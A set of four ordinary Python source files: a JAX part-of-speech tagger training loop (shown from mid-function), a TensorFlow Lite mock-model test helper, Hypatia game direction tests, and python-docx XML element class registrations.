train_keys = ['inputs', 'targets']
(inputs, targets) = [batch.get(k, None) for k in train_keys]
weights = jnp.where(targets > 0, 1, 0).astype(jnp.float32)
dropout_rng, new_dropout_rng = random.split(dropout_rng)
def loss_fn(params):
"""Loss function used for training."""
logits = model.apply({'params': params}, inputs=inputs, train=True,
rngs={'dropout': dropout_rng})
loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights)
mean_loss = loss / weight_sum
return mean_loss, logits
step = optimizer.state.step
lr = learning_rate_fn(step)
grad_fn = jax.value_and_grad(loss_fn, has_aux=True)
(_, logits), grad = grad_fn(optimizer.target)
grad = jax.lax.pmean(grad, 'batch')
new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)
metrics = compute_metrics(logits, targets, weights)
metrics['learning_rate'] = lr
return new_optimizer, metrics, new_dropout_rng
def pad_examples(x, desired_batch_size):
"""Expand batch to desired size by zeros with the shape of last slice."""
batch_pad = desired_batch_size - x.shape[0]
# Padding with zeros to avoid that they get counted in compute_metrics.
return np.concatenate([x, np.tile(np.zeros_like(x[-1]), (batch_pad, 1))])
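# Example (illustrative): if the last eval batch has 3 rows but the global
# batch size is 8, pad_examples appends 5 zero rows shaped like the final
# row, e.g. (3, 256) -> (8, 256). The padded rows have target 0 and hence
# weight 0 in compute_metrics, so they do not distort the reported numbers.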
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
# Make sure tf does not allocate gpu memory.
tf.config.experimental.set_visible_devices([], 'GPU')
batch_size = FLAGS.batch_size
learning_rate = FLAGS.learning_rate
num_train_steps = FLAGS.num_train_steps
eval_freq = FLAGS.eval_frequency
random_seed = FLAGS.random_seed
if not FLAGS.dev:
raise app.UsageError('Please provide path to dev set.')
if not FLAGS.train:
raise app.UsageError('Please provide path to training set.')
if batch_size % jax.device_count() > 0:
raise ValueError('Batch size must be divisible by the number of devices')
device_batch_size = batch_size // jax.device_count()
if jax.process_index() == 0:
train_summary_writer = tensorboard.SummaryWriter(
os.path.join(FLAGS.model_dir, FLAGS.experiment + '_train'))
eval_summary_writer = tensorboard.SummaryWriter(
os.path.join(FLAGS.model_dir, FLAGS.experiment + '_eval'))
# create the training and development dataset
vocabs = input_pipeline.create_vocabs(FLAGS.train)
config = models.TransformerConfig(
vocab_size=len(vocabs['forms']),
output_vocab_size=len(vocabs['xpos']),
max_len=FLAGS.max_length)
attributes_input = [input_pipeline.CoNLLAttributes.FORM]
attributes_target = [input_pipeline.CoNLLAttributes.XPOS]
train_ds = input_pipeline.sentence_dataset_dict(
FLAGS.train,
vocabs,
attributes_input,
attributes_target,
batch_size=batch_size,
bucket_size=config.max_len)
train_iter = iter(train_ds)
eval_ds = input_pipeline.sentence_dataset_dict(
FLAGS.dev,
vocabs,
attributes_input,
attributes_target,
batch_size=batch_size,
bucket_size=config.max_len,
repeat=1)
model = models.Transformer(config)
rng = random.PRNGKey(random_seed)
rng, init_rng = random.split(rng)
# call a jitted initialization function to get the initial parameter tree
@jax.jit
def initialize_variables(init_rng):
init_batch = jnp.ones((config.max_len, 1), jnp.float32)
init_variables = model.init(init_rng, inputs=init_batch, train=False)
return init_variables
init_variables = initialize_variables(init_rng)
optimizer_def = optim.Adam(learning_rate, beta1=0.9, beta2=0.98,
eps=1e-9, weight_decay=1e-1)
optimizer = optimizer_def.create(init_variables['params'])
optimizer = jax_utils.replicate(optimizer)
learning_rate_fn = create_learning_rate_scheduler(
base_learning_rate=learning_rate)
p_train_step = jax.pmap(
functools.partial(train_step, model=model, learning_rate_fn=learning_rate_fn),
axis_name='batch')
def eval_step(params, batch):
"""Calculate evaluation metrics on a batch."""
inputs, targets = batch['inputs'], batch['targets']
weights = jnp.where(targets > 0, 1.0, 0.0)
logits = model.apply({'params': params}, inputs=inputs, train=False)
return compute_metrics(logits, targets, weights)
p_eval_step = jax.pmap(eval_step, axis_name='batch')
# We init the first set of dropout PRNG keys, but update it afterwards inside
# the main pmap'd training update for performance.
dropout_rngs = random.split(rng, jax.local_device_count())
metrics_all = []
tick = time.time()
best_dev_score = 0
for step, batch in zip(range(num_train_steps), train_iter):
batch = common_utils.shard(jax.tree_map(lambda x: x._numpy(), batch)) # pylint: disable=protected-access
optimizer, metrics, dropout_rngs = p_train_step(optimizer, batch, dropout_rng=dropout_rngs)
metrics_all.append(metrics)
if (step + 1) % eval_freq == 0:
metrics_all = common_utils.get_metrics(metrics_all)
lr = metrics_all.pop('learning_rate').mean()
metrics_sums = jax.tree_map(jnp.sum, metrics_all)
denominator = metrics_sums.pop('denominator')
summary = jax.tree_map(lambda x: x / denominator, metrics_sums) # pylint: disable=cell-var-from-loop
summary['learning_rate'] = lr
logging.info('train in step: %d, loss: %.4f', step, summary['loss'])
if jax.process_index() == 0:
tock = time.time()
steps_per_sec = eval_freq / (tock - tick)
tick = tock
train_summary_writer.scalar('steps per second', steps_per_sec, step)
for key, val in summary.items():
train_summary_writer.scalar(key, val, step)
train_summary_writer.flush()
metrics_all = [] # reset metric accumulation for next evaluation cycle.
eval_metrics = []
eval_iter = iter(eval_ds)
for eval_batch in eval_iter:
eval_batch = jax.tree_map(lambda x: x._numpy(), eval_batch) # pylint: disable=protected-access
# Handle final odd-sized batch by padding instead of dropping it.
cur_pred_batch_size = eval_batch['inputs'].shape[0]
if cur_pred_batch_size != batch_size:
# pad up to batch size
eval_batch = jax.tree_map(
lambda x: pad_examples(x, batch_size), eval_batch)
eval_batch = common_utils.shard(eval_batch)
metrics = p_eval_step(optimizer.target, eval_batch)
eval_metrics.append(metrics)
eval_metrics = common_utils.get_metrics(eval_metrics)
eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics)
eval_denominator = eval_metrics_sums.pop('denominator')
eval_summary = jax.tree_map(
lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop
eval_metrics_sums)
logging.info('eval in step: %d, loss: %.4f, accuracy: %.4f', step,
eval_summary['loss'], eval_summary['accuracy'])
if best_dev_score < eval_summary['accuracy']:
best_dev_score = eval_summary['accuracy']
# TODO: save model.
eval_summary['best_dev_score'] = best_dev_score
logging.info('best development model score %.4f', best_dev_score)
if jax.process_index() == 0:
for key, val in eval_summary.items():
eval_summary_writer.scalar(key, val, step)
eval_summary_writer.flush()
if __name__ == '__main__':
app.run(main)
|
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions that support testing.
All functions that can be commonly used by various tests are in this file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from flatbuffers.python import flatbuffers
from tensorflow.lite.python import schema_py_generated as schema_fb
def BuildMockModel():
"""Creates a flatbuffer object containing an example model."""
builder = flatbuffers.Builder(1024)
schema_fb.BufferStart(builder)
buffer0_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStartDataVector(builder, 10)
builder.PrependUint8(0)
builder.PrependUint8(1)
builder.PrependUint8(2)
builder.PrependUint8(3)
builder.PrependUint8(4)
builder.PrependUint8(5)
builder.PrependUint8(6)
builder.PrependUint8(7)
builder.PrependUint8(8)
builder.PrependUint8(9)
buffer1_data_offset = builder.EndVector(10)
schema_fb.BufferStart(builder)
schema_fb.BufferAddData(builder, buffer1_data_offset)
buffer1_offset = schema_fb.BufferEnd(builder)
schema_fb.BufferStart(builder)
buffer2_offset = schema_fb.BufferEnd(builder)
schema_fb.ModelStartBuffersVector(builder, 3)
builder.PrependUOffsetTRelative(buffer2_offset)
builder.PrependUOffsetTRelative(buffer1_offset)
builder.PrependUOffsetTRelative(buffer0_offset)
buffers_offset = builder.EndVector(3)
string0_offset = builder.CreateString('input_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape0_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string0_offset)
schema_fb.TensorAddShape(builder, shape0_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 0)
tensor0_offset = schema_fb.TensorEnd(builder)
schema_fb.QuantizationParametersStartMinVector(builder, 5)
builder.PrependFloat32(0.5)
builder.PrependFloat32(2.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
quant1_min_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartMaxVector(builder, 5)
builder.PrependFloat32(10.0)
builder.PrependFloat32(20.0)
builder.PrependFloat32(-50.0)
builder.PrependFloat32(1.0)
builder.PrependFloat32(2.0)
quant1_max_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartScaleVector(builder, 5)
builder.PrependFloat32(3.0)
builder.PrependFloat32(4.0)
builder.PrependFloat32(5.0)
builder.PrependFloat32(6.0)
builder.PrependFloat32(7.0)
quant1_scale_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStartZeroPointVector(builder, 5)
builder.PrependInt64(1)
builder.PrependInt64(2)
builder.PrependInt64(3)
builder.PrependInt64(-1)
builder.PrependInt64(-2)
quant1_zero_point_offset = builder.EndVector(5)
schema_fb.QuantizationParametersStart(builder)
schema_fb.QuantizationParametersAddMin(builder, quant1_min_offset)
schema_fb.QuantizationParametersAddMax(builder, quant1_max_offset)
schema_fb.QuantizationParametersAddScale(builder, quant1_scale_offset)
schema_fb.QuantizationParametersAddZeroPoint(builder,
quant1_zero_point_offset)
quantization1_offset = schema_fb.QuantizationParametersEnd(builder)
string1_offset = builder.CreateString('constant_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape1_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string1_offset)
schema_fb.TensorAddShape(builder, shape1_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 1)
schema_fb.TensorAddQuantization(builder, quantization1_offset)
tensor1_offset = schema_fb.TensorEnd(builder)
string2_offset = builder.CreateString('output_tensor')
schema_fb.TensorStartShapeVector(builder, 3)
builder.PrependInt32(1)
builder.PrependInt32(2)
builder.PrependInt32(5)
shape2_offset = builder.EndVector(3)
schema_fb.TensorStart(builder)
schema_fb.TensorAddName(builder, string2_offset)
schema_fb.TensorAddShape(builder, shape2_offset)
schema_fb.TensorAddType(builder, 0)
schema_fb.TensorAddBuffer(builder, 2)
tensor2_offset = schema_fb.TensorEnd(builder)
schema_fb.SubGraphStartTensorsVector(builder, 3)
builder.PrependUOffsetTRelative(tensor2_offset)
builder.PrependUOffsetTRelative(tensor1_offset)
builder.PrependUOffsetTRelative(tensor0_offset)
tensors_offset = builder.EndVector(3)
schema_fb.SubGraphStartInputsVector(builder, 1)
builder.PrependInt32(0)
inputs_offset = builder.EndVector(1)
schema_fb.SubGraphStartOutputsVector(builder, 1)
builder.PrependInt32(2)
outputs_offset = builder.EndVector(1)
schema_fb.OperatorCodeStart(builder)
schema_fb.OperatorCodeAddBuiltinCode(builder, schema_fb.BuiltinOperator.ADD)
schema_fb.OperatorCodeAddVersion(builder, 1)
code_offset = schema_fb.OperatorCodeEnd(builder)
schema_fb.ModelStartOperatorCodesVector(builder, 1)
builder.PrependUOffsetTRelative(code_offset)
codes_offset = builder.EndVector(1)
schema_fb.OperatorStartInputsVector(builder, 2)
builder.PrependInt32(0)
builder.PrependInt32(1)
op_inputs_offset = builder.EndVector(2)
schema_fb.OperatorStartOutputsVector(builder, 1)
builder.PrependInt32(2)
op_outputs_offset = builder.EndVector(1)
schema_fb.OperatorStart(builder)
schema_fb.OperatorAddOpcodeIndex(builder, 0)
schema_fb.OperatorAddInputs(builder, op_inputs_offset)
schema_fb.OperatorAddOutputs(builder, op_outputs_offset)
op_offset = schema_fb.OperatorEnd(builder)
schema_fb.SubGraphStartOperatorsVector(builder, 1)
builder.PrependUOffsetTRelative(op_offset)
ops_offset = builder.EndVector(1)
string3_offset = builder.CreateString('subgraph_name')
schema_fb.SubGraphStart(builder)
schema_fb.SubGraphAddName(builder, string3_offset)
schema_fb.SubGraphAddTensors(builder, tensors_offset)
schema_fb.SubGraphAddInputs(builder, inputs_offset)
schema_fb.SubGraphAddOutputs(builder, outputs_offset)
schema_fb.SubGraphAddOperators(builder, ops_offset)
subgraph_offset = schema_fb.SubGraphEnd(builder)
schema_fb.ModelStartSubgraphsVector(builder, 1)
builder.PrependUOffsetTRelative(subgraph_offset)
subgraphs_offset = builder.EndVector(1)
string4_offset = builder.CreateString('model_description')
schema_fb.ModelStart(builder)
schema_fb.ModelAddOperatorCodes(builder, codes_offset)
schema_fb.ModelAddSubgraphs(builder, subgraphs_offset)
schema_fb.ModelAddDescription(builder, string4_offset)
schema_fb.ModelAddBuffers(builder, buffers_offset)
model_offset = schema_fb.ModelEnd(builder)
builder.Finish(model_offset)
model_data = builder.Output()
return model_data
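# A short usage sketch (illustrative; assumes the flatbuffer accessors
# generated in schema_py_generated):
#
#   model_data = BuildMockModel()
#   model = schema_fb.Model.GetRootAsModel(model_data, 0)
#   model.Description()              # -> b'model_description'
#   subgraph = model.Subgraphs(0)
#   subgraph.TensorsLength()         # -> 3 (input, constant, output tensors)
#   model.Buffers(1).DataAsNumpy()   # -> the 10 bytes stored in buffer 1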
|
|
# This module is part of Hypatia and is released under the
# MIT license: http://opensource.org/licenses/MIT
"""py.test unit testing for hypatia/constants.py
"""
import os
import pygame
import pytest
from hypatia import physics
from hypatia import constants
try:
os.chdir('demo')
except OSError:
pass
class TestDirection(object):
"""Various tests for py.test regarding constants.Direction.
See Also:
constants.Direction
"""
def test_add(self):
"""Assure that adding cardinal directions
together produces an ordinal direction.
"""
# North + West == North West
assert (constants.Direction.north + constants.Direction.west ==
constants.Direction.north_west)
# North + East == North East
assert (constants.Direction.north + constants.Direction.east ==
constants.Direction.north_east)
# South + West == South West
assert (constants.Direction.south + constants.Direction.west ==
constants.Direction.south_west)
# South + East = South East
assert (constants.Direction.south + constants.Direction.east ==
constants.Direction.south_east)
def test_disposition(self):
"""Assure the ability to get a pixel (x, y) offset
from a direction using Direction.disposition() works.
"""
direction = constants.Direction
# north disposition of 1 is (0, -1)
# The default offset/padding is 1.
assert direction.disposition(direction.north) == (0, -1)
# north east disposition of 98 is (98, -98)
assert direction.disposition(direction.north_east, 98,) == (98, -98)
# east disposition of 9 is (9, 0):
assert direction.disposition(direction.east, 9) == (9, 0)
# South East disposition of 30 is (30, 30)
assert direction.disposition(direction.south_east, 30) == (30, 30)
# South disposition of 4 is (0, 4)
assert direction.disposition(direction.south, 4) == (0, 4)
# South West disposition of 8 is (-8, 8)
assert direction.disposition(direction.south_west, 8) == (-8, 8)
# A west disposition of 1 is (-1, 0)
assert direction.disposition(direction.west, margin=1) == (-1, 0)
# north west disposition of 55 is (-55, -55)
assert direction.disposition(direction.north_west, 55) == (-55, -55)
def test_from_velocity(self):
"""Check that we are reliably producing
a direction from a given velocity.
"""
# (0, -8) is moving North
velocity = physics.Velocity(0, -8)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.north)
# (999, 0) is moving East
velocity = physics.Velocity(999, 0)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.east)
# (0, 1) is moving South
velocity = physics.Velocity(0, 1)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.south)
# (-10, 0) is moving West
velocity = physics.Velocity(-10, 0)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.west)
# (2, -5) is moving North East
velocity = physics.Velocity(2, -5)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.north_east)
# (73, 9) is moving South East
velocity = physics.Velocity(73, 9)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.south_east)
# (-22, 55) is moving South West
velocity = physics.Velocity(-22, 55)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.south_west)
        # (-6, -55) is moving North West
        velocity = physics.Velocity(-6, -55)
assert (constants.Direction.from_velocity(velocity) ==
constants.Direction.north_west)
# (0, 0) is no direction/none
velocity = physics.Velocity(0, 0)
assert constants.Direction.from_velocity(velocity) is None
def test_cardinal(self):
"""Assure the cardinal directions produce match
the order and values supplied.
"""
# Cardinals: North, East, South, West
assert (constants.Direction.north,
constants.Direction.east,
constants.Direction.south,
constants.Direction.west) == constants.Direction.cardinal()
def test_direction_aliases(self):
"""Test that the various aliases for directions work, i.e.,
the axis movement aliases (x+, x-, y+, y-).
"""
# x+ is East
assert constants.Direction.x_plus() == constants.Direction.east
# x- is West
assert constants.Direction.x_minus() == constants.Direction.west
# y+ is South
assert constants.Direction.y_plus() == constants.Direction.south
# y- is North
assert constants.Direction.y_minus() == constants.Direction.north
def test_opposite(self):
"""Assure opposite directions are being produced correctly.
"""
direction = constants.Direction
# The opposite of North is South
assert (direction.opposite(direction.north) ==
direction.south)
# The opposite of South is North
assert (direction.opposite(direction.south) ==
direction.north)
# The opposite of East is West
assert (direction.opposite(direction.east) ==
direction.west)
# The opposite of West is East
assert (direction.opposite(direction.west) ==
direction.east)
# The opposite of North East is South West
assert (direction.opposite(direction.north_east) ==
direction.south_west)
# The opposite of South West is North East
assert (direction.opposite(direction.south_west) ==
direction.north_east)
# The opposite of North West is South East
assert (direction.opposite(direction.north_west) ==
direction.south_east)
# The opposite of South East is North West
assert (direction.opposite(direction.south_east) ==
direction.north_west)
# The opposite of North South is East West
assert (direction.opposite(direction.north_south) ==
direction.east_west)
# The opposite of East West is North South
        assert (direction.opposite(direction.east_west) ==
                direction.north_south)
def test_action():
"""Test constants.Action.
"""
assert constants.Action.stand == constants.Action(1)
assert constants.Action.walk == constants.Action(2)
|
|
# encoding: utf-8
"""
Initializes oxml sub-package, including registering custom element classes
corresponding to Open XML elements.
"""
from __future__ import absolute_import
from lxml import etree
from .ns import NamespacePrefixedTag, nsmap
# configure XML parser
element_class_lookup = etree.ElementNamespaceClassLookup()
oxml_parser = etree.XMLParser(remove_blank_text=True, resolve_entities=False)
oxml_parser.set_element_class_lookup(element_class_lookup)
def parse_xml(xml):
"""
Return root lxml element obtained by parsing XML character string in
*xml*, which can be either a Python 2.x string or unicode. The custom
parser is used, so custom element classes are produced for elements in
*xml* that have them.
"""
root_element = etree.fromstring(xml, oxml_parser)
return root_element
def register_element_cls(tag, cls):
"""
Register *cls* to be constructed when the oxml parser encounters an
element with matching *tag*. *tag* is a string of the form
``nspfx:tagroot``, e.g. ``'w:document'``.
"""
nspfx, tagroot = tag.split(':')
namespace = element_class_lookup.get_namespace(nsmap[nspfx])
namespace[tagroot] = cls
def OxmlElement(nsptag_str, attrs=None, nsdecls=None):
"""
Return a 'loose' lxml element having the tag specified by *nsptag_str*.
*nsptag_str* must contain the standard namespace prefix, e.g. 'a:tbl'.
The resulting element is an instance of the custom element class for this
tag name if one is defined. A dictionary of attribute values may be
provided as *attrs*; they are set if present. All namespaces defined in
the dict *nsdecls* are declared in the element using the key as the
prefix and the value as the namespace name. If *nsdecls* is not provided,
a single namespace declaration is added based on the prefix on
*nsptag_str*.
"""
nsptag = NamespacePrefixedTag(nsptag_str)
if nsdecls is None:
nsdecls = nsptag.nsmap
return oxml_parser.makeelement(
nsptag.clark_name, attrib=attrs, nsmap=nsdecls
)
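# A minimal usage sketch (illustrative; the tag/class pairing shown is
# hypothetical, the real registrations follow below):
#
#   p = OxmlElement('w:p')            # loose <w:p> element with w: declared
#   body = parse_xml(
#       '<w:body xmlns:w="%s"/>' % nsmap['w']
#   )                                  # parsed with the custom class lookup
#   register_element_cls('w:example', CT_String)   # hypothetical mapping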
# ===========================================================================
# custom element class mappings
# ===========================================================================
from .shared import CT_DecimalNumber, CT_OnOff, CT_String
from .coreprops import CT_CoreProperties
register_element_cls('cp:coreProperties', CT_CoreProperties)
from .document import CT_Body, CT_Document
register_element_cls('w:body', CT_Body)
register_element_cls('w:document', CT_Document)
from .numbering import (
CT_Num, CT_Numbering, CT_NumLvl, CT_NumPr
)
register_element_cls('w:abstractNumId', CT_DecimalNumber)
register_element_cls('w:ilvl', CT_DecimalNumber)
register_element_cls('w:lvlOverride', CT_NumLvl)
register_element_cls('w:num', CT_Num)
register_element_cls('w:numId', CT_DecimalNumber)
register_element_cls('w:numPr', CT_NumPr)
register_element_cls('w:numbering', CT_Numbering)
register_element_cls('w:startOverride', CT_DecimalNumber)
from .section import CT_PageMar, CT_PageSz, CT_SectPr, CT_SectType
register_element_cls('w:pgMar', CT_PageMar)
register_element_cls('w:pgSz', CT_PageSz)
register_element_cls('w:sectPr', CT_SectPr)
register_element_cls('w:type', CT_SectType)
from .shape import (
CT_Blip, CT_BlipFillProperties, CT_GraphicalObject,
CT_GraphicalObjectData, CT_Inline, CT_NonVisualDrawingProps, CT_Picture,
CT_PictureNonVisual, CT_Point2D, CT_PositiveSize2D, CT_ShapeProperties,
CT_Transform2D
)
register_element_cls('a:blip', CT_Blip)
register_element_cls('a:ext', CT_PositiveSize2D)
register_element_cls('a:graphic', CT_GraphicalObject)
register_element_cls('a:graphicData', CT_GraphicalObjectData)
register_element_cls('a:off', CT_Point2D)
register_element_cls('a:xfrm', CT_Transform2D)
register_element_cls('pic:blipFill', CT_BlipFillProperties)
register_element_cls('pic:cNvPr', CT_NonVisualDrawingProps)
register_element_cls('pic:nvPicPr', CT_PictureNonVisual)
register_element_cls('pic:pic', CT_Picture)
register_element_cls('pic:spPr', CT_ShapeProperties)
register_element_cls('wp:docPr', CT_NonVisualDrawingProps)
register_element_cls('wp:extent', CT_PositiveSize2D)
register_element_cls('wp:inline', CT_Inline)
from .styles import CT_LatentStyles, CT_LsdException, CT_Style, CT_Styles
register_element_cls('w:basedOn', CT_String)
register_element_cls('w:latentStyles', CT_LatentStyles)
register_element_cls('w:locked', CT_OnOff)
register_element_cls('w:lsdException', CT_LsdException)
register_element_cls('w:name', CT_String)
register_element_cls('w:next', CT_String)
register_element_cls('w:qFormat', CT_OnOff)
register_element_cls('w:semiHidden', CT_OnOff)
register_element_cls('w:style', CT_Style)
register_element_cls('w:styles', CT_Styles)
register_element_cls('w:uiPriority', CT_DecimalNumber)
register_element_cls('w:unhideWhenUsed', CT_OnOff)
from .table import (
CT_Row, CT_Tbl, CT_TblGrid, CT_TblGridCol, CT_TblLayoutType, CT_TblPr,
CT_TblWidth, CT_Tc, CT_TcPr, CT_VMerge
)
register_element_cls('w:bidiVisual', CT_OnOff)
register_element_cls('w:gridCol', CT_TblGridCol)
register_element_cls('w:gridSpan', CT_DecimalNumber)
register_element_cls('w:tbl', CT_Tbl)
register_element_cls('w:tblGrid', CT_TblGrid)
register_element_cls('w:tblLayout', CT_TblLayoutType)
register_element_cls('w:tblPr', CT_TblPr)
register_element_cls('w:tblStyle', CT_String)
register_element_cls('w:tc', CT_Tc)
register_element_cls('w:tcPr', CT_TcPr)
register_element_cls('w:tcW', CT_TblWidth)
register_element_cls('w:tr', CT_Row)
register_element_cls('w:vMerge', CT_VMerge)
from .text.font import (
CT_Color, CT_Fonts, CT_Highlight, CT_HpsMeasure, CT_RPr, CT_Underline,
CT_VerticalAlignRun
)
register_element_cls('w:b', CT_OnOff)
register_element_cls('w:bCs', CT_OnOff)
register_element_cls('w:caps', CT_OnOff)
register_element_cls('w:color', CT_Color)
register_element_cls('w:cs', CT_OnOff)
register_element_cls('w:dstrike', CT_OnOff)
register_element_cls('w:emboss', CT_OnOff)
register_element_cls('w:highlight', CT_Highlight)
register_element_cls('w:i', CT_OnOff)
register_element_cls('w:iCs', CT_OnOff)
register_element_cls('w:imprint', CT_OnOff)
register_element_cls('w:noProof', CT_OnOff)
register_element_cls('w:oMath', CT_OnOff)
register_element_cls('w:outline', CT_OnOff)
register_element_cls('w:rFonts', CT_Fonts)
register_element_cls('w:rPr', CT_RPr)
register_element_cls('w:rStyle', CT_String)
register_element_cls('w:rtl', CT_OnOff)
register_element_cls('w:shadow', CT_OnOff)
register_element_cls('w:smallCaps', CT_OnOff)
register_element_cls('w:snapToGrid', CT_OnOff)
register_element_cls('w:specVanish', CT_OnOff)
register_element_cls('w:strike', CT_OnOff)
register_element_cls('w:sz', CT_HpsMeasure)
register_element_cls('w:u', CT_Underline)
register_element_cls('w:vanish', CT_OnOff)
register_element_cls('w:vertAlign', CT_VerticalAlignRun)
register_element_cls('w:webHidden', CT_OnOff)
from .text.paragraph import CT_P
register_element_cls('w:p', CT_P)
from .text.parfmt import (
CT_Ind, CT_Jc, CT_PPr, CT_Spacing, CT_TabStop, CT_TabStops
)
register_element_cls('w:ind', CT_Ind)
register_element_cls('w:jc', CT_Jc)
register_element_cls('w:keepLines', CT_OnOff)
register_element_cls('w:keepNext', CT_OnOff)
register_element_cls('w:pageBreakBefore', CT_OnOff)
register_element_cls('w:pPr', CT_PPr)
register_element_cls('w:pStyle', CT_String)
register_element_cls('w:spacing', CT_Spacing)
register_element_cls('w:tab', CT_TabStop)
register_element_cls('w:tabs', CT_TabStops)
register_element_cls('w:widowControl', CT_OnOff)
from .text.run import CT_Br, CT_R, CT_Text
register_element_cls('w:br', CT_Br)
register_element_cls('w:r', CT_R)
register_element_cls('w:t', CT_Text)